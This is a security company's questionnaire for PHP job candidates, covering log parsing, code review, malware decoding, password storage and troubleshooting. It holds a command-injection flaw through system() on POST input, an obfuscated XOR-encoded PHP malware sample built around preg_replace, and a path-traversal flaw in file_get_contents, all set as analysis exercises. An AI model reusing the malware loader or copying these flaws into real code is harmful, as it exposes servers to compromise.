Thanks for the interest in working with Sucuri. Do you mind answering those questions to help us evaluate your PHP/Development experience? There is no right or wrong, it is more for us to get a better understanding of where you are. Please send your responses to jobs@sucuri.net.
Technical Questions
1-PHP basics
Our applications generate a lot of logs. Some times we need to write quick PHP scripts to parse them and generate simple reports. This is a log dump from one web server:
Can you download it and do a quick PHP script to read/parse the results and generate a simple report from it? Nothing fancy, but it would need to list the total number of entries found, how many of them were errors or success (based on the HTTP return code), what files were visited more often and the most popular referers (and their %'s too).
Bonus: List the top user agents (and their %'s) and try to separate any malicious request from the "good" ones.
2-PHP code analysis
You are working on a specific code base and you see this entry:
if(isset($_POST['email']))
{
$email_input = trim(htmlspecialchars($_POST['email']));
// Run email command to notify user of account creation
system("/opt/app/accounts/notifynew.sh $email_input");
}
Do you see any performance or security issue in there? Would you re-write it? Why? How?
3-PHP decoding
Some times to write code to detect malware, we also need to be able to decode them. Can you decode this piece of code and let us know what it does? What would you do to automate decoding them when parsing a PHP file?
/*amOmMQfUYVN0OxwwRjomMCHT1A0KOZXoCl 2wjQHwPWkBI2lxexzlHpmH12gOgizxwrkV INEsONk1AEozqvfS3WJZkp8aduIDGFvOS18hDhXDmC4S kqvuFWaCx4x674BsHUiF2lmPoORhhF8Hws32FS LrxIkz1sJZxBAaQpoiNLoKTa3MR9eM1q4ozedpNmEBnFb5uG */ //miBy10TC1A7ezb8fokkqNqHIaOlZhthJ $IPwXsveV='p'. 'reg_replac'.'e'; $ivAqSMVn="rbjfxy6ilF1hhrbHIo3"^"\x5d\x1b\x22\x02\x283c9\x2b3y\x0c\x1b\x1a\x2e\x10\x04\x40V"; $IPwXsveV($ivAqSMVn, "P2aIsq04NK9Ymr8IIz6AuNiV8WclRl6hcVpKCoEPyDnbulj3ae4Lrchpy0RGkMnDhTNk8S1wVeNGFx0fR4r0VOpKN7QyI42qMFQKXG8skLyp9xLQr4QCH6MV2cJAWAqjF8udDrLo4AU3ygIfZZhgUu3MMBMjC3IHz3l4kwhdx3VmYeHx4pU"^"5D\x00\x25\x5bSYRf\x22J\x2a\x08\x06\x10\x15\x15\x5ei\x13\x30\x1f\x3c\x13k\x038K1\x04\x115JvVmcG\x284Ll2\x3eQ38v\x30\x30q\x1f\x268O\x13\x11\x17\x0fnKpSdO\x60\x2dX\x0a7\x05N2Wws\x7fOQ\x044V\x40UezAy\x2d\x072\x1a\x2d\x02\x0b\x14\x7eaxk\x7ea\x18\x1a\x18\x3f\x1c\x04\x11\x24\x10u\x2df\x14\x12\x1ds\x1e\x02iD\x3a\x29\x27\x1e\x12\x05\x22\x5dR9m\x5bl\x14\x14\x24\x23R\x15O\x15\x3a\x7e\x05\x3a\x22\x04\x20v\x1e\x19\x19j\x1a\x2bC\x16\x2b\x15W\x09\x136\x5eSD\x1dK\x3f\x19qLsXIR\x7c", "yHdPJUPGuHdshLXM");
4-Secure Coding practices
When building a authentication system, how would you store the user passwords? Let's say we have a form to create an account and that is passing the user + pass via POST:
$_POST['user'] $_POST['pass']
Now we need a function to store them securely. How would you do that function?
5-Dev ops
You just pushed some changes to the server and now all pages are giving a 503 (internal server error). What steps would you take to fix the error and understand what is going on?
6-Code review
Do you see anything wrong with this code? It was found inside a php file that we were reviewing.
<?php
if(isset($_GET['page']))
{
$_GET['page'] = htmlspecialchars($_GET['page']);
echo '<title>'.$_GET['page'].'</title>';
}
else
{
$_GET['page'] = "index";
echo '<title>Welcome to site </title>';
}
$content = file_get_contents("/site/content/".$_GET['page']);
echo htmlspecialchars($content);
..
If there is an issue, how would you fix it?
7-Presentation
Based on your responses from question #1, how would you present it to the end user in a dashboard to summarize your findings?
Please send your responses to jobs@sucuri.net.